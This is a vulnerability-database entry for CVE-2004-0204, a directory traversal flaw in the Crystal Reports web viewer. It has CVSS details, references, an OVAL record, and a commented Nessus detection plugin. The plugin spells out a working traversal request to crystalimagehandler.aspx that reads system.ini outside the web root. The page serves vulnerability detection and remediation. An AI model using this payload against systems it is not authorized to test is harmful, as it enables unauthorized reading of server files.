Vulnerabilities > CVE-2004-0204 - Directory Traversal vulnerability in Business Objects Crystal Reports Web Form Viewer

047910
CVSS 7.5 - HIGH
Attack vector
NETWORK
Attack complexity
LOW
Privileges required
NONE
Confidentiality impact
PARTIAL
Integrity impact
PARTIAL
Availability impact
PARTIAL
network
low complexity
bea
borland-software
businessobjects
microsoft
nessus
exploit available

Summary

Directory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimage argument to crystalimagehandler.aspx.

Exploit-Db

descriptionBusiness Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability. CVE-2004-0204. Remote exploit for windows platform
idEDB-ID:24077
last seen2016-02-02
modified2004-05-03
published2004-05-03
reporterImperva Application Defense Center
sourcehttps://www.exploit-db.com/download/24077/
titleBusiness Objects Crystal Reports 9/10 Web Form Viewer Directory Traversal Vulnerability

Nessus

NASL familyCGI abuses
NASL idCRYSTAL_REPORTS_DIRECTORY_TRAVERSAL.NASL
descriptionThe remote host is running a version of Crystal Report Web interface that is vulnerable to a remote directory traversal attack. An attacker exploiting this issue would be able to read or delete arbitrary files outside of the web root.
last seen2020-06-01
modified2020-06-02
plugin id12271
published2004-06-11
reporterThis script is Copyright (C) 2004-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/12271
titleMS04-017: Crystal Reports Web Viewer Could Allow Information Disclosure and DoS (842689) (uncredentialed check)
code
#
# (C) Tenable Network Security, Inc.
#

# Engine gate: stop quietly when the interpreter reports NASL_LEVEL below 3000.
# NOTE(review): presumably the library calls used further down need a newer
# engine; the exact dependency is not visible in this file -- confirm.
if (NASL_LEVEL < 3000)
{
  exit(0);
}

include("compat.inc");

# Registration branch: taken only when `description` is set. It records the
# plugin's metadata and then exits, so nothing in this block contacts the
# target host.
if (description)
{
 # Plugin identity and revision bookkeeping.
 script_id(12271);
 script_version ("1.32");
 script_cvs_date("Date: 2018/11/15 20:50:16");

 # Cross-references used to correlate a finding with advisories and patches:
 # the CVE entry, the Bugtraq id, and the Microsoft bulletin / KB article.
 script_cve_id("CVE-2004-0204");
 script_bugtraq_id(10260);
 script_xref(name:"MSFT", value: "MS04-017");
 script_xref(name:"MSKB", value:"842689");

 # The name states "(uncredentialed check)": the finding comes from an HTTP
 # response, not from inspecting installed files or patch state on the host.
 script_name(english:"MS04-017: Crystal Reports Web Viewer Could Allow Information Disclosure and DoS (842689) (uncredentialed check)");
 script_summary(english:"Crystal Report virtual directory traversal");

 script_set_attribute(attribute:"synopsis",value:
"The web application running on the remote host has a directory
traversal vulnerability." );
 # Impact as described: read or delete of arbitrary files outside the web root.
 script_set_attribute(attribute:"description", value:
"The remote host is running a version of Crystal Report Web interface
that is vulnerable to a remote directory traversal attack.  An
attacker exploiting this issue would be able to read or delete
arbitrary files outside of the web root." );
 script_set_attribute(
  attribute:"see_also", 
  value:"https://docs.microsoft.com/en-us/security-updates/SecurityBulletins/2004/ms04-017"
 );
 # Remediation text offers two options: the vendor update, or restricting
 # access to the viewer's virtual directory with ACLs as a mitigation.
 script_set_attribute(
  attribute:"solution", 
  value:"Upgrade the software or utilize ACLs on the virtual directory."
 );
 # CVSS v2 base vector: network reachable, low complexity, no authentication,
 # partial impact on confidentiality, integrity and availability.
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
 # CVSS v2 temporal vector: functional exploit exists (E:F), official fix
 # available (RL:OF), report confidence not defined (RC:ND).
 script_set_cvss_temporal_vector("CVSS2#E:F/RL:OF/RC:ND");
 script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
 script_set_attribute(attribute:"exploit_available", value:"true");
 script_set_attribute(attribute:"plugin_publication_date", value: "2004/06/11");
 script_set_attribute(attribute:"vuln_publication_date", value: "2004/06/08");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 # NOTE(review): the CPE names crystal_reports_server only, while the CVE text
 # also lists products that embed the viewer (Visual Studio .NET 2003, Outlook
 # 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2).
 # Asset matching by CPE alone may therefore miss affected hosts.
 script_set_attribute(attribute:"cpe", value:"cpe:/a:businessobjects:crystal_reports_server");
 script_end_attributes();

 # Declared as an information-gathering check in the "CGI abuses" family.
 script_category(ACT_GATHER_INFO);
 script_family(english:"CGI abuses");
 script_copyright(english:"This script is Copyright (C) 2004-2018 Tenable Network Security, Inc.");
 # Scheduling hints: depends on http_version.nasl and targets ports registered
 # under Services/www, or port 80.
 script_dependencie("http_version.nasl");
 script_require_ports("Services/www", 80);
 # NOTE(review): presumably keeps the plugin from running when the scan policy
 # disables CGI scanning -- confirm against the engine's handling of this key.
 script_exclude_keys("Settings/disable_cgi_scanning");
 exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


# Detection: for each candidate viewer directory, request the image handler
# with a traversal value in `dynamicimage` and look in the response body for
# the "[drivers]" string, which the script treats as proof that system.ini
# was returned. The probe is a single GET per directory and only reads a file;
# the delete impact named in the advisory is never exercised.
#
# NOTE(review): only the "winnt" system directory name is requested, so a host
# whose system directory has a different name is not flagged. A clean result
# from this plugin is therefore not proof that the viewer is patched; confirm
# with the MS04-017 patch state on the host.
port = get_http_port(default:80);

# Directories to test: the configured CGI directories plus the viewer paths
# hard-coded here.
candidate_dirs = make_list(
  cgi_dirs(),
  "/CrystalReportWebFormViewer",
  "/CrystalReportWebFormViewer2",
  "/crystalreportViewers"
);

foreach base (candidate_dirs)
{
  probe_url = base + "/crystalimagehandler.aspx?dynamicimage=../../../../../../../../winnt/system.ini";

  # exit_on_fail ends the whole script on a failed request instead of moving
  # on to the next directory.
  reply = http_send_recv3(method:"GET", item:probe_url, port:port, exit_on_fail: 1);

  # Marker absent from the body: this directory did not hand back the file.
  if ( "[drivers]" >!< reply[2] ) continue;

  # Lowest verbosity: report the finding on the port with no extra detail.
  if (!(report_verbosity > 0))
  {
    security_hole(port);
    exit(0);
  }

  details = string(
    "\n",
    "Nessus accessed system.ini by requesting the following URL :\n\n",
    "  ", build_url(port: port, qs: probe_url), "\n"
  );

  # NOTE(review): at this verbosity the retrieved file content is copied into
  # the scan report, so the report itself then holds data read from the host.
  if (report_verbosity > 1)
    details += string("\nWhich revealed the contents :\n\n", reply[2], "\n");

  security_hole(port:port, extra:details);

  # First confirmed directory is enough; stop after reporting it.
  exit(0);
}


Oval

accepted2016-02-19T10:00:00.000-04:00
classvulnerability
contributors
  • nameAndrew Buttner
    organizationThe MITRE Corporation
  • nameJonathan Baker
    organizationThe MITRE Corporation
descriptionDirectory traversal vulnerability in the web viewers for Business Objects Crystal Reports 9 and 10, and Crystal Enterprise 9 or 10, as used in Visual Studio .NET 2003 and Outlook 2003 with Business Contact Manager, Microsoft Business Solutions CRM 1.2, and other products, allows remote attackers to read and delete arbitrary files via ".." sequences in the dynamicimage argument to crystalimagehandler.aspx.
familywindows
idoval:org.mitre.oval:def:1157
statusaccepted
submitted2004-06-09T12:00:00.000-04:00
titleCrystal Reports Business Objects Directory Traversal
version5